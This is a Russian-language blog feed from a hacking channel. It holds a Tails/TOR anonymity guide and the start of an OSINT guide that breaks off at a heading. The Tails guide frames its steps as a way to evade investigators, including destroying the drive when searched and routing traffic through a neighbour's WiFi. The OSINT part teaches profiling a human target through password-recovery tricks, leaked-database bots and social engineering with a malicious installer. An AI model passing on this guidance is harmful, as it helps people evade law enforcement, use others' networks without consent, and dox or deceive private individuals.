  &lt;h2 id=&quot;8APd&quot; data-align=&quot;center&quot;&gt;Стоит ли доверять сети TOR?&lt;/h2&gt;
  &lt;p id=&quot;5uu8&quot; data-align=&quot;center&quot;&gt;Эта тема для обсуждения часто вызывает недоразумения, но, хотел бы выразить своё мнение. Я давно слежу за этой разработкой и все чаще наблюдаю как людей, которые использовали TOR для нелегальной деятельности (речь о крупных преступниках) ловят с, казалось бы, абсурдными доказательствами. Друзья, у нас нет никаких прямых фактов &amp;quot;оккупации&amp;quot; тора силовиками, вся эта информация — догадки общества. TOR — одно из самых старых, адекватных решений которое не требует вложений, согласитесь. Практически всех преступников находят только благодаря их глупости и человеческому фактору. (зарегистрировал аккаунт на свой email, оставил следы в клирнете, использовал одинаковые пароли, связал личности и пр.) Ваш IP рыть будут в самом-самом крайнем случае и то не факт. Если всё же доверия нет, посмотрите в сторону GNUnet — это отличная альтернатива TOR, по моему мнению.&lt;/p&gt;
  &lt;p id=&quot;jK8L&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;3I0c&quot; data-align=&quot;center&quot;&gt;Установка Tails на флешку&lt;/h2&gt;
  &lt;p id=&quot;X1S8&quot; data-align=&quot;center&quot;&gt;Да, система будет находиться на обычной загрузочной флешке, прямо как та, с помощью который вы устанавливаете Windows. Принцип работы ниже.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6w2J&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вставили флешку --&amp;gt; включили компьютер --&amp;gt; поработали --&amp;gt; выключили компьютер --&amp;gt; извлекли флешку --&amp;gt; при следующем запуске не будет никаких следов использования, чистая флешка = чистая система.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;K0Wy&quot; data-align=&quot;center&quot;&gt;Весь секрет в том, что данные хранятся в оперативной памяти, которая автоматически очищается при выключении ПК. Если к вам постучат грабители в масках, можно отправить флешку поплавать в туалет, тем самым сделать её недееспособной. Грабители смогут обнаружить только чистый SDD/HDD диск, на котором смогут найти только фото котиков и папку &amp;quot;море 2005&amp;quot;.&lt;br /&gt;Не забудьте очистить прошлые данные безвозвратно методом &amp;quot;Гурмана&amp;quot;!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;blockquote id=&quot;MoYj&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Очень важно&lt;/strong&gt;: не вытягивайте флешку во время работы, не выключайте ПК с розетки. Если грабители будут умны, они сделают &amp;quot;дамп&amp;quot; оперативной памяти и смогут получить слепок вашей прошлой сессии, запомните это! &lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;hhs6&quot; data-align=&quot;center&quot;&gt;Итак, чтобы установить Tails на флешку, нам нужно скачать загрузочный образ системы на их &lt;a href=&quot;https://tails.boum.org/install/download/index.en.html&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;официальном сайте&lt;/strong&gt;&lt;/a&gt; и &lt;a href=&quot;https://tails.boum.org/etcher/balenaEtcher-portable.exe&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;balenaEtcher&lt;/strong&gt;&lt;/a&gt;. (прямая ссылка)&lt;br /&gt;&lt;strong&gt;Минимальные требования к системе:&lt;/strong&gt; &lt;strong&gt;2&lt;em&gt;GB&lt;/em&gt;&lt;/strong&gt; &lt;strong&gt;ОЗУ | 8&lt;em&gt;GB&lt;/em&gt; Памяти на флешке&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;QUpf&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4f/36/4f365bb1-192d-4b75-8976-c038e6d7a3d0.png&quot; width=&quot;685&quot; /&gt;
    &lt;figcaption&gt;Загрузочная страница Tails&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Jla0&quot; data-align=&quot;center&quot;&gt;После успешной загрузки, присоедините флешку к компьютеру и запустите balenaEtcher. Выберите путь к загруженному &amp;quot;&lt;code&gt;.iso&lt;/code&gt;&amp;quot; файлу и саму флешку. У меня показывает треугольник из-за огромного пространства на накопителе, программа считает флешку за полноценный диск. Не обращаем внимание, это никак не повлияет на ход установки. После выбора нажимаем &amp;quot;Flash&amp;quot; и ждём минуты 3-4.&lt;br /&gt;После завершения извлеките флешку. На этом установка закончена.&lt;/p&gt;
  &lt;figure id=&quot;AsYn&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/97/25/9725caad-4b0f-4eca-9c8f-1d140228b5b2.png&quot; width=&quot;764&quot; /&gt;
    &lt;figcaption&gt;Процесс установки Tails&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;xcg3&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;x1Ms&quot; data-align=&quot;center&quot;&gt;Загрузка Tails в качестве системы&lt;/h2&gt;
  &lt;p id=&quot;sSFE&quot; data-align=&quot;center&quot;&gt;Тут ситуация неоднозначна, нам нужно попасть в BIOS и установить флешку в качестве диска для дефолтной загрузки. Проблема в том, что каждый производитель делает разные комбинации клавиш для этого попадания в это меню, поэтому воспользуйтесь поисковиком и сконструируйте подобный запрос: &lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;pq6q&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;&amp;quot;How to Enter the BIOS on {ваш производитель материнской платы}&amp;quot;&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;KY0v&quot; data-align=&quot;center&quot;&gt;После попадания в BIOS, найдите вкладку отвечающую за загрузку. В основном, ей присвоено имя &amp;quot;&lt;code&gt;Boot&lt;/code&gt;&amp;quot;. Вам нужно переместить флешку на первое место/выбрать в качестве загрузчика, ориентируйтесь на интерфейс, который подскажет вам нужные клавиши. У меня была похожая ситуация, как на фото.&lt;br /&gt;После этого действия сохранитесь и перезапустите систему.&lt;/p&gt;
  &lt;figure id=&quot;yizh&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7b/47/7b47b48b-78c4-46ee-8448-f00bbf37b960.png&quot; width=&quot;734.9999999999999&quot; /&gt;
    &lt;figcaption&gt;Выбор загрузочного устройства в BIOS&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;7xue&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;EvGb&quot; data-align=&quot;center&quot;&gt;Наш первый запуск&lt;/h2&gt;
  &lt;p id=&quot;ZRFE&quot; data-align=&quot;center&quot;&gt;Нас встретит меню, в котором нужно выполнить базовую настройку. Вам нужно нажать на &amp;quot;+&amp;quot; и создать пароль администратора, он должен быть надёжным.&lt;/p&gt;
  &lt;figure id=&quot;mqLK&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/91/ee/91ee059a-9d64-41d8-b1f7-6f4f3bfe2b91.png&quot; width=&quot;703&quot; /&gt;
    &lt;figcaption&gt;Настройка Tails после первого запуска&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;n4zr&quot; data-align=&quot;center&quot;&gt;Также, можно сменить язык на русский/добавить его в клавиатуру. Остальные настройки &lt;strong&gt;НЕ ТРОГАЕМ!&lt;/strong&gt; Если вы не планируете подключаться к общедоступным WiFi, где требуется авторизация в виде браузерной страницы (такое зачастую можно было увидеть в MacDonalds) — оставляйте значение &amp;quot;Enabled&amp;quot; напротив &amp;quot;Unsafe Browser&amp;quot;, в ином случае советую отключить. Если вы хотите сделать так, чтобы какая-то информация не удалялась после перезагрузки — создайте &amp;quot;Persistent Storage&amp;quot;. Это по сути контейнер, в котором можно хранить приложения/закладки браузера/какие-то файлы и так далее.&lt;/p&gt;
  &lt;p id=&quot;3uVM&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;Q4Ns&quot; data-align=&quot;center&quot;&gt;Настройка Persistent Storage&lt;/h2&gt;
  &lt;p id=&quot;R2DY&quot; data-align=&quot;center&quot;&gt;Чтобы перейти в настройки, воспользуйтесь поиском приложений и впишите &amp;quot;Configure persistent volume&amp;quot;. После открытия нас встретит меню, которое предложит создать пароль. Не пренебрегайте сложностью, это важно. &lt;/p&gt;
  &lt;figure id=&quot;HS7Q&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0f/04/0f04fbfc-3fd1-4854-8665-cd18c017c57b.png&quot; width=&quot;634&quot; /&gt;
    &lt;figcaption&gt;Создание пароля Persistent Storage (скриншот не мой)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;a2R4&quot; data-align=&quot;center&quot;&gt;После ввода, нам станет доступно меню, в котором можно выбирать то, что мы хотим сохранять даже после перезагрузки. Я советую выбрать &amp;quot;Additional Software&amp;quot; &amp;amp; &amp;quot;Browser Bookmarks&amp;quot;, чтобы сохранять приложения и закладки в TOR браузере. Эта область хорошо защищена используя &amp;quot;LUKS&amp;quot; (дефолтное шифрование систем на Linux) и получить доступ к ней можно только в том случае, если злоумышленнику известен ваш неимоверно сложный пароль. Кстати, вы можете хранить любые файлы в папке &amp;quot;Persistent storage&amp;quot; — но не стоит добавлять сюда то, что сможет быть интересно &amp;quot;злоумышленнику&amp;quot;, ведь из-за этого существенно теряется основное преимущество системы — Live режим.&lt;/p&gt;
  &lt;figure id=&quot;1YT1&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/48/67/4867e70f-8e7e-46c7-9e44-1d56f3eefe1b.png&quot; width=&quot;582&quot; /&gt;
    &lt;figcaption&gt;Настройки Persistent Storage (скриншот не мой)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;F8dO&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;DP0f&quot; data-align=&quot;center&quot;&gt;Настройка TOR Browser&lt;/h2&gt;
  &lt;p id=&quot;LL0h&quot; data-align=&quot;center&quot;&gt;Да, работать мы будем именно в нём. Но, вы при желании можете установить абсолютно любой другой. Первым делом, уберите галочки в местах, как на скриншоте. Таким образом мы не будем удалять историю / куки после рестарта браузера. Это бесящая функция, которая в нашем случае абсолютно бесполезна, ведь с каждой перезагрузкой системы у нас удаляются все данные об использовании в целом. Так мы спасём несколько нервных клеток при внезапном закрытии браузера, которое часто происходило у меня в первое время=)&lt;/p&gt;
  &lt;figure id=&quot;lAHI&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e9/4d/e94d984b-603c-41d5-a96b-53fd26d81db1.png&quot; width=&quot;653&quot; /&gt;
    &lt;figcaption&gt;Отключение очистки данных после перезапуска браузера&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dxRy&quot; data-align=&quot;center&quot;&gt;Далее, устанавливаем расширение &amp;quot;Canvas Blocker&amp;quot;. Tor браузер имеет огромный минус — статический фингерпринт. Да, он его подменяет, хоть на этом спасибо. Но, сопоставив наши следы можно выстроить цепочку посещений сайтов. Канвас блокер исправит эту проблему, сделав фингеры динамическими с каждым обновлением страницы. Имеется открытый исходный код на GitHub, все как мы любим. Для установки перейдите на &lt;a href=&quot;https://github.com/kkapsner/CanvasBlocker&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;GitHub&lt;/strong&gt;&lt;/a&gt;/&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;магазин расширений Firefox&lt;/strong&gt;&lt;/a&gt;. Имеются гибкие настройки, но в стандартном конфиге все уже сделали за нас.&lt;/p&gt;
  &lt;figure id=&quot;KUmY&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/36/0d/360d11b2-d752-449b-80dc-bd52f92df707.png&quot; width=&quot;671&quot; /&gt;
    &lt;figcaption&gt;Настройки Canvas Blocker&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;lMF0&quot; data-align=&quot;center&quot;&gt;Также, настоятельно рекомендую выключить JavaScript, хоть и сайты могут работать некорректно. Если в браузере найдут какой-то новый эксплойт, вы, скорее всего сможете обойти его стороной, потому что для выполнения практически всех вредоносных кодов чаще всего используется js. Сделать это можно двумя способами: расширение &amp;quot;NoScript&amp;quot;, которое автоматически поставляется с браузером или же включение режима &amp;quot;Safest&amp;quot; — советую второе.&lt;/p&gt;
  &lt;figure id=&quot;vy4f&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b2/5d/b25d9aae-c8eb-4541-b767-eb859826e50f.png&quot; width=&quot;708&quot; /&gt;
    &lt;figcaption&gt;Настройки безопасности TOR Браузер&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Neaa&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;6Dhf&quot; data-align=&quot;center&quot;&gt;Подключение к RDP (опционально)&lt;/h2&gt;
  &lt;p id=&quot;5W9D&quot; data-align=&quot;center&quot;&gt;Если у вас есть дедик, вы можете использовать его как хранилище, чтобы не вводить все пароли каждый раз. Это все конечно круто, но учтите, используя дедик вы доверяете свою информацию третьему лицу, которое в любой момент может воткнуть вам палки в колёса. Всегда выбирайте порядочных хостеров! К сожалению, Tails не предусмотрела по умолчанию утилиту для коннекта по RDP, но мы сможем это исправить в одну строчку! Для этого откройте терминал и введите эту команду. (терминал находится в разделе &amp;quot;Utilities&amp;quot;)&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;7Hu9&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt install remmina&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;2Q1F&quot; data-align=&quot;center&quot;&gt;В качестве подтверждения нас запросит пароль, который мы указывали при первом запуске — вводим его. После этого, можно будет обнаружить утилиту используя поиск. Вы можете корректировать настройки для более стабильной скорости, ни для кого не секрет, что ноды тора в основном под большой нагрузкой. Я советую установить кастомное разрешение экрана (800x600), глубину цветов — 8bpp. Учтите, что в выходные дни нагрузка намного выше.&lt;/p&gt;
  &lt;figure id=&quot;FcbO&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/25/f3/25f3702f-138d-4136-a3eb-73b69737db49.png&quot; width=&quot;655&quot; /&gt;
    &lt;figcaption&gt;Клиент Remmina&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;sYWH&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;1F3r&quot; data-align=&quot;center&quot;&gt;Почему мы не используем VPN?&lt;/h2&gt;
  &lt;p id=&quot;xgKn&quot; data-align=&quot;center&quot;&gt;Ответ прост: от них нет никакой пользы. Не верьте никому, никакой MullVad не спасёт вас, это централизованная сеть которая рано или поздно попадёт в руки спецслужб, если ещё не попала. Нужно ли пропускать трафик через посредника? Решать вам. Запомните, VPN — средство смены IP, шифрования трафика, обхода блокировок, но никак не анонимности. Наш мир работает абсолютно не так, как все привыкли его воспринимать, особенно Интернет пространство. Если у спецслужб нет доступа, они его откроют для себя даже втихую, нелегально. Привет, FBI, которое сидит в телефоне каждого жителя планеты Земля и считывает по звукам нажатия клавиатуры мой текст! К слову, обеспечивайте анонимность не только своего ПК, а и всего того, что его окружает. Наши материнки имеют закрытый код и в них, вероятно, может находиться backdoor, это уже было доказано на практике. Мыслите шире, если около вас лежит iPhone — забудьте в целом об анонимности. Я бы хотел выпустить полноценный гайд на 30 страниц, но оставлю эту идею для моего будущего YouTube канала=) Так вот, о нашей теме.. Tails блокирует все порты = VPN законнектить не получится. Единственный выход — открывать порты мануально, что уничтожит изоляцию системы под 0 и она потеряет свой смысл. Тут дело каждого.&lt;/p&gt;
  &lt;p id=&quot;JM3g&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;yc7n&quot; data-align=&quot;center&quot;&gt;Подводим итоги&lt;/h2&gt;
  &lt;p id=&quot;Edh6&quot; data-align=&quot;center&quot;&gt;Весь наш трафик проходит через WiFi соседа, наше устройство имеет сменный MAC и идентифицировать нашу личность будет сложно, потому что MAC не взаимодействовал с нашей личной сетью и не был занесён в базы провайдера. Используя децентрализованную сеть TOR мы получаем высокую степень защиты IP, с настройкой браузера — исключаем трекеры/инъекции разного типа. Если нашу систему смогут каким-то образом сфальсифицировать, злоумышленники смогут получить IP адрес соседа, который никак не связан с нами. Представим, что злоумышленники — воры, которые решили ограбить соседа. В таком случае они не смогут залезть в нашу квартиру/дом, а мы оперативно сможем посетить ближайший туалет и смыть нашу систему. Наши устройства абсолютно чисты, даже если ограбить попытаются нас, по недостатку улик воры закинут эту идею, подумывая что ошиблись адресом. Обычно на этом этапе закрываются все дела, потому что бумажки без доказательной базы — просто бумажки. Вы сможете обсуждать любой ход действий &lt;a href=&quot;https://t.me/hack2day_chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;в нашем чате&lt;/strong&gt;&lt;/a&gt;. Опять же упомяну, это не мануал по полной анонимности, это — база &lt;s&gt;криминального&lt;/s&gt; мира, которая хорошо зарекомендовала себя временем. Всем мирного неба над головой!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:QFVIUbNnVkW</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/QFVIUbNnVkW?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>OSINT: Начало</title><published>2023-04-22T22:16:20.619Z</published><updated>2023-04-22T22:55:35.517Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/bc/88/bc88b463-43d6-4feb-bec3-aecf75219ab9.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/db/a6/dba60e56-ddcb-4fc1-a0e0-6aead1fe81b4.png&quot;&gt;Приветствую. Многие меня просили написать статью о OSINT. Ребята, вместить всю информацию в одну статью будет крайне сложно, люди на такие темы пишут книги=) Мы попытаемся охватить основы, которые смогут дать общее понимание и базовые инструменты. Это очень интересная тема и она 100% ещё не раз будет раскрыта более детально в нашем канале. Если вы ещё не с нами — присоединяйтесь в наше сообщество. Так же, мы создали чат для общения!</summary><content type="html">
  &lt;p id=&quot;uoVw&quot; data-align=&quot;center&quot;&gt;Приветствую. Многие меня просили написать статью о OSINT. Ребята, вместить всю информацию в одну статью будет крайне сложно, люди на такие темы пишут книги=) Мы попытаемся охватить основы, которые смогут дать общее понимание и базовые инструменты. Это очень интересная тема и она 100% ещё не раз будет раскрыта более детально в нашем канале. Если вы ещё не с нами — &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;присоединяйтесь&lt;/strong&gt;&lt;/a&gt; в наше сообщество. Так же, мы создали &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;чат для общения&lt;/strong&gt;&lt;/a&gt;!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6kBB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;ДИС&lt;code&gt;КЛЕЙ&lt;/code&gt;МЕР&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;i7Dw&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;S7D0&quot; data-align=&quot;center&quot;&gt;Немного о OSINT&lt;/h2&gt;
  &lt;p id=&quot;Amjp&quot; data-align=&quot;center&quot;&gt;Сам по себе термин расшифровывается как &amp;quot;&lt;code&gt;разведка на основе открытых данных&lt;/code&gt;&amp;quot;, но зачастую этого мало. Хороший осинтер тот, кто умеет не только найти информацию из открытых источников, но и раздобыть её самостоятельно. Социальная инженерия очень важный компонент, без которого далеко вы не продвинетесь. Главная задача в этой сфере — максимально сократить круг поиска. Если нам известна страна, примерный возраст цели и имя — мы сократили круг с 8млдр. до ~10млн. Вся наша последующая задача будет состоять в том, чтобы найти любую зацепку, которая сможет сузить его сильнее. Это достаточно увлекательное занятие которое действительно затягивает. Так как я не скрываю свою личность, вы можете попрактиковаться даже на мне=)&lt;br /&gt;Так вот, чтобы искать информацию, существует множество сервисов и методик, мы рассмотрим только главное и наиболее эффективное. Статья будет вашей методичкой которую я советую добавить в закладки, вы часто будете посещать эту страницу. Все действия будут показаны хаотично, потому что создать универсальный пошаговый список действий не является возможным, вы будете работать с разной информацией. Попросить помощи можно &lt;a href=&quot;https://t.me/hack2day_chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;в нашем чатике&lt;/strong&gt;&lt;/a&gt;.&lt;br /&gt;&lt;em&gt;p.S.: Стоит упомянуть, что наша цель — человек, хоть и осинтить можно всё.&lt;/em&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;ccz9&quot; data-align=&quot;center&quot;&gt;Базовые правила&lt;/h2&gt;
  &lt;p id=&quot;x3N9&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Я бы хотел вынести основные вещи&lt;/strong&gt;, которые вы должны делать, чтобы получить максимальный результат. &lt;strong&gt;Первое&lt;/strong&gt;: всегда записывайте и сохраняйте найденную информацию. Ваш поиск должен быть как пазл, вы собираете его по частям и в конце смотрите на картину. Порой, какой-то старый комментарий на форуме об автомобилях который вы сочли за мусор может стать той самой недостающей деталью. Также, &lt;strong&gt;делайте копии страниц&lt;/strong&gt; &lt;strong&gt;&lt;em&gt;используя &lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/single-file/&quot; target=&quot;_blank&quot;&gt;SingleFile&lt;/a&gt;&lt;/em&gt;&lt;/strong&gt;, не поленитесь и создайте &lt;u&gt;папку под каждую цель&lt;/u&gt;, сохраняя в неё всю найденную информацию.&lt;br /&gt;&lt;strong&gt;Второе&lt;/strong&gt;: выжимайте соки с каждой зацепки, даже если мысль кажется бессмысленной. Если вы нашли соц. сеть цели, &lt;u&gt;максимально взаимодействуйте с ней&lt;/u&gt;. Речь о восстановлении пароля с целью узнать последние цифры номера/часть мыла, поиска старых упоминаний/никнеймов и прочее, зависит от ситуаций. Если Instagram покажет нам последние 2 цифры номера, мыло покажет средние 3, &lt;strong&gt;этого уже вполне достаточно для сопоставления цепочки.&lt;br /&gt;Третье: соблюдай конфиденциальность. &lt;/strong&gt;Не используйте личные аккаунты поисковиков, личные telegram, которые можно связать с вашей личностью и прочее. Некоторые используют для регистраций личный email, оставляя везде свой цифровой след и тем самым подставляют свою задницу под очередной дамп, пополняя базы. Если ресурс вам не важен (второстепенные сайты для одноразового захода) — &lt;u&gt;используйте &lt;a href=&quot;https://tempail.com/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;одноразовое&lt;/strong&gt;&lt;/a&gt; мыло&lt;/u&gt;. Если нужно сохранить доступ к ресурсу — &lt;u&gt;создайте ящик на &lt;a href=&quot;http://proton.me&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;proton.me&lt;/strong&gt;&lt;/a&gt;&lt;/u&gt;. И нет, это дерьмо абсолютно не анонимно, не слушайте идиотов, которые твердят вам это. Но для наших целей — в самый раз! Оно удобно тем, что не требует никаких SMS для регистрации.&lt;br /&gt;В идеале ваш почтовый ящик должен выглядеть примерно вот так: &lt;br /&gt;&lt;code&gt;D5d5UM1R4iZiFA_{название сервиса}_86mWfFBed7dTN@proton.me&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;0ZyB&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/db/a6/dba60e56-ddcb-4fc1-a0e0-6aead1fe81b4.png&quot; width=&quot;717&quot; /&gt;
    &lt;figcaption&gt;пример папки для Osint&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;np9V&quot; data-align=&quot;center&quot;&gt;Мультиинструменты&lt;/h2&gt;
  &lt;p id=&quot;mQ7I&quot; data-align=&quot;center&quot;&gt;Эти инструменты вы должны использовать в первую очередь. Они предоставят нам базовую информацию, с помощью которой мы сможем начать рыть наш &amp;quot;туннель&amp;quot;. Искать в них можно все что угодно: телеграм, почту, номер, юзернейм и пр. Главное: не пробивайте там самих себя! Это первая, казалось бы, банальная ошибка, но её очень часто совершают многие опытные ребята=)&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;BazQ&quot; data-align=&quot;center&quot;&gt;1. &lt;a href=&quot;https://t.me/UniversalSearchRobot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;UniversalSearch&lt;/strong&gt;&lt;/a&gt; - умеет искать практически по любой информации. Бесплатен.&lt;br /&gt;2. &lt;a href=&quot;https://t.me/QuickLeakBot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;QuickLeak&lt;/strong&gt;&lt;/a&gt; - старый, легендарный бот. Есть 2 бесплатных запроса. 10$/мес.&lt;br /&gt;3. &lt;a href=&quot;https://eyeofgodbot.com&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;EyeOfGod&lt;/strong&gt;&lt;/a&gt; - тот самый &amp;quot;Глаз Бога&amp;quot;, в представлении не нуждается. 90р/день.&lt;br /&gt;4. &lt;a href=&quot;https://himera-search.net/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Himera&lt;/strong&gt;&lt;/a&gt; - работает &lt;em&gt;не &lt;/em&gt;только по &amp;quot;открытым источникам&amp;quot;, один запрос = ~109р.&lt;/p&gt;
  &lt;p id=&quot;Cotq&quot; data-align=&quot;center&quot;&gt;&lt;em&gt;Я не стану расписывать возможности каждого, они все выполняют одну функцию, только по разным базам. Не вижу смысла делать огромный список, главные тулзы при правильном использовании отлично делают свою работу.&lt;/em&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;t0RS&quot; data-align=&quot;center&quot;&gt;Социальная инженерия&lt;/h2&gt;
  &lt;p id=&quot;JDYV&quot; data-align=&quot;center&quot;&gt;Хотел выделить несколько строчек, потому что OSINT без использования СИ часто не выдаёт стоящего результата. Никогда не бойтесь общаться с целью, вы должны изучить её с ног до головы. Человек — это самая большая дыра в безопасности. Большинство преступлений раскрывается не из-за &amp;quot;продажного VPN&amp;quot;, а из-за глупости особи за экраном. Я бы хотел показать вам кейс который мне показался забавным, но и в то же время неимоверно гениальным=)&lt;/p&gt;
  &lt;figure id=&quot;Sp9M&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9b/86/9b86624f-37ca-4966-b504-e8f76ff7c1f6.png&quot; width=&quot;552&quot; /&gt;
    &lt;figcaption&gt;пример социальной инженерии&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;d3Wg&quot; data-align=&quot;center&quot;&gt;Заметка: &amp;quot;.msi&amp;quot; файлы используются для установки приложений в среде Windows, этот тип так же как и &amp;quot;.exe&amp;quot; может вмещать в себе вредоносное П.О..&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;PFsL&quot; data-align=&quot;center&quot;&gt;Это креативное занятие, которое в большинстве случаев требует индивидуального подхода к каждому человеку. Если вам интересно, обратите внимание на книгу &amp;quot;&lt;a href=&quot;https://xss.is/threads/71999/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Социальная инженерия и этичный хакинг на практике (2022)&lt;/strong&gt;&lt;/a&gt;&amp;quot;. В ней описано множество методов атак, о которых вы, скорее всего даже и подумать не могли. К слову, об OSINT там тоже есть несколько толковых глав.&lt;br /&gt;Прекрасное чтиво перед сном, рекомендую от чистого сердца!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;lRXz&quot; data-align=&quot;center&quot;&gt;Поисковики — главный инструмент&lt;/h2&gt;
